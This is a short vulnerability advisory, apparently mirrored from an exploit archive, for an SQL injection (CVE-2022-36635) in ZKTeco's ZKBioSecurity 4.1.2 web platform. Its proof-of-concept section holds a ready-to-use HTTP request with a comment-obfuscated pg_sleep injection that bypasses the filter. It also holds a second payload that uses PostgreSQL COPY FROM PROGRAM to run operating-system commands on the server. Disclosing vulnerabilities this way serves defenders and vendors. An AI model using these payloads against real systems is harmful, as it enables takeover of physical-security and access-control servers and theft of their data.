Share
## https://sploitus.com/exploit?id=PACKETSTORM:168586
#######################ADVISORY INFORMATION#######################  
  
Product: ZKSecurity BIO  
  
Vendor: ZKTeco (  
https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)  
  
Version Affected: 4.1.2  
  
CVE: CVE-2022-36635  
  
Vulnerability: SQL Injection (with a plus: RCE)  
  
#######################CREDIT#######################  
  
This vulnerability was discovered and researched by Caio Burgardt and  
Silton Santos.  
  
#######################INTRODUCTION#######################  
  
Based on the hybrid biometric technology and computer vision technology,  
ZKBioSecurity provides a comprehensive web-based security platform. It  
contains multiple integrated modules: personnel, time & attendance, access  
control, visitor management, offline & online consumption management, guard  
patrol, parking, elevator control, entrance control, Facekiosk, intelligent  
video management, mask and temperature detection module, and other smart  
sub-systems.  
  
#######################VULNERABILITY DETAILS#######################  
  
The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQL  
query, with only a sanitization filter in front of it. Using comments  
(/**/) in place of spaces was enough to confuse and bypass the filter.  
  
#######################PROOF OF CONCEPT#######################  
  
Note that the request delayed 10s:  
  
POST /baseOpLog.do HTTP/1.1  
  
Host: {HOST}  
  
Content-Type: application/x-www-form-urlencoded  
  
Cookie: SESSION={COOKIE}; menuType=icon-only  
  
Content-Length: 208  
  
list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50  
  
if you use the next query, you can execute remote command:  
  
list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='  
  
  
#######################END#######################